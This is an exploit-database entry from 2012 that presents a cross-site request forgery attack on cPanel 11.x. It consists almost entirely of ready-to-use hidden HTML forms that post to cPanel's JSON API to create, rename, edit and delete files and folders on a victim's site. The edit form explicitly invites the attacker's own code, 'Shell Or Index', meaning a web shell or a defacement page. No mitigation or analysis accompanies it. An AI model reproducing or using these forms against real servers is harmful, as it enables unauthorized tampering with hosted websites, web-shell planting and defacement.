Cpanel 11.X Multiple CSRF Vulnerability

2012-05-26T00:00:00
ID 1337DAY-ID-18357
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-05-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Cpanel 11.X Multiple CSRF Vulnerability
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################

===[ Exploit ]===


Add File
========

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkfile"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine.php"/>
</form>

</body>
</html>


<input type="hidden" name="name" value="Palestine.php"/>  Ur File Name



Rename File
===========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
<input type="hidden" name="destfiles" value="Test.php"/>

</body>
</html>


<input type="hidden" name="destfiles" value="Test.php"/>  New Name



Edit File
=========

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="savefile"/>
<input type="hidden" name="dir" value="/home/User/public_html"/>
<input type="hidden" name="filename" value="Palestine.php"/>
<input type="hidden" name="content" value="Ur Code (Shell Or Index)"/>
<input type="hidden" name="utf8_fallback" value="1"/>
<input type="hidden" name="charset" value="utf-8"/>
</form>

</body>
</html>



Delete File
============

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
</form>

</body>
</html>


<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>  File Name Delete



Add Folder
===========

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkdir"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine"/>
</form>

</body>
</html>


<input type="hidden" name="name" value="Palestine"/>  Ur Folder Name



Rename Folder
=============

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
<input type="hidden" name="destfiles" value="Test"/>
</form>

</body>
</html>


<input type="hidden" name="destfiles" value="Test"/>  New Name


 
Delete Folder
=============

<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
</form>

</body>
</html>

<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>  Folder Name Delete
####################################################################



#  0day.today [2018-01-03]  #